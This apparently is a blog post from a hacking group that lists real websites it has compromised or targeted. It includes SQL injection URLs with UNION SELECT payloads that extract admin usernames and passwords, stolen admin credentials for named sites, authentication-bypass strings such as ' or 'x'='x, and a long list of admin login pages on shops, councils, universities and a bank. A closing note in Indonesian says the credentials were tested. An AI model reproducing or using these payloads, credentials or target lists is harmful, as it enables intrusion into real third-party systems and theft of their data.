http://www.turtlebaycompany.com/adminlogin.asp
User: kblack7674
Pass: donnisha
[US CCN - NO SHELL]
======================================
http://www.atlsadecv.com/product.asp?intProdID=56%20union%20select%201,2,username,4,password,6,7,8,9,10,11,12,13,14,15%20from%20admin%27--sp_password
http://www.atlsadecv.com/upload.asp
User: atladmin
Pass: ljubljana1234
[Can not find Admin - No SHELL]
======================================
SQL injection
www.calwestpoolsandspas.com/product.cfm?CatID=1
http://www.transducertechniques.com/admin/
======================================
http://70.90.214.242/senders/cart/product.asp?intProdID=2%20union%20select%201,2,3,4,5,6,7,8,9,10%20from%20admin%27--sp_password
http://70.90.214.242/senders/cart/upload.asp
[Nothing - Can not query]
======================================
http://www.perduesinc.com/product.asp?intProdID=182%20union%20select%201,2,username,password,5,6,7,8,9,10,11,12,13,14%20from%20admin%27--sp_password
http://www.perduesinc.com/adminlogin.asp
User: conniz
Pass: website
[Nothing - NO SHELL]
======================================
http://abcchc.com
[BANK _ Credit Card _ LOAN]
======================================
http://deals-r-us.net/admin_logon.asp
User: ????
Pass: tigers06
======================================
https://www.nashvilledailygrind.com/images/vcard.asp
[Nothing - Can not do anything]
======================================
http://www.petreynovelty.com/product.asp?intProdID=1705
http://www.petreynovelty.com/Intranet/login.htm
User: Admin
Pass: 24322
======================================
http://www.carolinafloats.com/upload.asp
http://www.carolinafloats.com/product.asp?intProdID=1%20union%20select%201,2,3,4,5,6,7,8,9,10%20from%20admin%27--sp_password
======================================
Target url is : http://www.stradadelvinodelletna.it/enoteca/productsByAzienda.asp?intAzID=4
Inject type is : Integer
DB type is : Access
The field's count 0
======================================
Target url is : http://www.ugenio.it/en/product.asp?intProdID=407
Inject type is : Integer
DB type is : Unknown
Field count is : 0
String field postion at : 0
======================================
~~~~~~~~~~~~~~~~~***~~~~~~~~~~~~~~~~~~
======================================
The SHOP this User + Pass is:
' or 'x'='x
'or''='
admin/' or 'x'='x
admin/'or''='
admin/admin
https://www.totalattorneys.com/crm/
http://usastudy.com.cn/crm/login.asp
http://www.sunflagsteel.com/crm/login.asp
http://sunpro.sunflagsteel.com/
tahsintour.com.tw/member_new/crm_login.asp
http://www.posunlimited.com/crm/login.asp
lakewoodconnect.lakewoodcity.org/crm/login.asp
http://www.desertsweetorganic.com/admin/home.asp
http://sslws023.alentus.com/desertsweetorganic/admin/home.asp
svenskmodellguide.com/cms/cms_login.asp
gg.uwyo.edu/cms/login/Login.asp?callNumber=14276&color=993300
coe.fgcu.edu/pdp/CSPD_Lib/CSPD_ADMIN_CMS/login.asp
http://fly.swissbusinessair.ch/sba/cms/login.asp
cms.swissbusinessair.ch/sba/cms/login.asp
evergreenproductions.org/pages/cms/login.asp
http://www.vodacomgs.co.za/cmslogin.asp
epreceptor.com/cms_aap/d_login.asp
http://www.zaundiscount.ch/zt/bqr_login.asp?user=0&lang=
http://www.longchengforging.com/CMS/login.asp
http://admin.tomahawk.de/
cmsnet.cmsresorts.com/Careers/Login.asp
cms.newmedia.ie/login.asp
http://www.oaktreeweb.com/cmsBasic/am_index2.asp
http://www.irdaonline.org/irdacontent/cms/insurerslogin.asp
cooperperry.staffs.sch.uk/cms/psblogger/login.asp
http://www.epreceptor.com/cms_acn/d_login.asp
http://www.piersmooreede.com/cms_login.asp
http://www.piersmooreede.com/cms_main.asp?appID=1
cms1.gre.ac.uk/csesoc/login.asp
http://www.czposlo.com/cms/login.asp
http://www.cmssec.com/pages/Login.asp
http://www.abr2006.com/site/cms/logmain.asp?key=IDqODsIUAAl5B2hxc
http://kmice.uum.edu.my/icoci09/Login.asp
http://www.smartdecat.co.uk/Secure_members_login.asp
http://www.nhh.com.hk/cms/member/login.asp
http://www.cmssecuritas.com/doc-login.asp
http://www.oldpickupclub.nl/galerie/cms/login.asp
http://hantangmec.w127.bizcn.com/skonn/CMS/login.asp
http://www.systime.net/wrRecordlogin.asp?cd=TechnologyStack-Sept-07(US)
http://www.cz-wt.com/CMS/login.asp
http://www.brandweerharen.nl/uitvoer/login/login.asp
http://mobile.deepweb.nl/html/cms_login.asp?Taal=EN#
http://www.toneelschuur.nl/cms/toneelschuur/tickets/login.asp
http://www.asiafairways.com/login.asp
http://ebusiness.icicibank.com/imarkets/login/login.asp
http://www.tg-badsoden.de/login.asp
http://www.tg-badsoden.de/admin/hilfe/
http://www.tg-badsoden.de/admin/filemanager/index.asp
http://www.fipsasp.com/subs/cms/_admin/login.asp
http://www.caravanhajj.com/app/cms/staff_login.asp
http://czcscca.com/CMS/login.asp
http://www.kiltubrid.com/parish/cms/login/login.asp
http://www.kiltubrid.com/cms/gaa/settings/admin_menu.asp
http://windbangkok.com/login.asp
http://cats.worldmicro.com/admin.asp
http://www.usi.edu/admin.asp
http://packageexpress.net/entrack/admin.asp
http://www2.boschsecurity.us/useradmin/useradmin.asp?b=regdealer
http://www.qualitasassistance.com/admin.asp
http://promisehealthcare.com/employees/admin.asp
http://www.expressyourselfdesigns.com/events/login.asp
http://cbi.state.co.us/admin.asp
http://www.cordaroys.com/admin/
http://www.ftrgold.com/PRC_admin.asp
http://www.tampico.com/admin.asp?sub=login
http://trotwood.k12.oh.us/CMW/content/login.asp
http://www.equineresindirectory.com/admin/newadmin.asp
http://www.fiber-connect.com/FCAdmin.asp?Action=Login
http://www.kgmcalculators.com/login_admin.asp
http://www.ybdoakmont.com/ado/login_admin.asp
http://www.projectcontrolgrp.com/login/login.asp?ret=/login/admin.asp
http://map.piqua.org/cmw/content/login.asp
http://www.onlinebingo.com/keno/keno_admin.asp
http://www.italvalvole.it/loginadmin.asp
http://www.veriprime.org/Admin.asp
http://www.creadirectory.com/login.asp
http://www.novarugby.com/components/Calendar/default.asp
http://icash.ch/index.html?ClickAndRank/admin.asp
http://www.kmsparts.com/administrator/manage.asp
http://www.westcoastharley.com/cart/login.asp
http://www.stri.co.uk/login.asp
http://www.kenway.co.uk/login.asp
http://www.avenirifa.co.uk/admin.asp
http://www.ukpleisure.co.uk/ukp/admin.asp?1=0
http://www.steve-cooper.co.uk/football/admin.asp
http://www.cunw.ac.uk/rhrw/news/admin.asp
http://www.str84wardpcs.co.uk/admin.asp
http://www.wirral-mbc.gov.uk/AfL/admin.asp
http://www.sstna.org/LogicalLevels/demo/admin.asp
http://www.sstna.org/Transitions/demo/admin.asp
http://abshus.com/no/tnpdbs/admin.asp
http://www.villabella-ravda.co.uk/html/admin.asp
http://www.meercom1.co.uk/admin.asp
http://www.uwannago.org.uk/H4U/ADMIN/ASP/from_admin_control_panel.html
http://dynamicbooking.co.uk/admin.asp
http://prep2.com/Admin.asp
http://www.niwep.org.uk/admin.asp
http://www.thurstongroup.co.uk/admin/home.asp
http://www.sociology.ox.ac.uk/apply/admin.asp
http://www.baufritz.co.uk/admin.asp
http://dbaa.net/demo2/secure/admin.asp
http://vusnet.co.uk/Admin.asp
http://www2002.stoke.gov.uk/council/det/accessteam/signpost/admin/admin.asp
http://www.uwannago.org.uk/H4U/ADMIN/ASP/db_qwik_login.asp?SortField=dbQwikLogin.%22User_Name%22&SortBy=DESC
http://www.springfieldparkchurch.co.uk/admin.asp
http://www.lynton-exports.co.uk/admin.asp
http://hotellosolivos.co.uk/sh_fw_admin/default.asp
http://amidaemporium.com/admin.asp
http://www.appiamsearch.com/IT/admin.asp
http://www.scdaat.co.uk/admin.asp
http://www.aphroditeweddingservices.co.uk/admin.asp
note :
semua username dan password telah di uji sebelumnya, apabila di kemudian hari anda mencoba dan gagal itu berarti kesalahan bukan terletak pada kami...
tetapi kemungkinan yang paling besar terjadi adalah username dan password telah di ganti oleh sang admin [fixed], karena sang admin curiga telah terjadi aktivitas mencurigakan di dalam data base nya...
No comments:
Post a Comment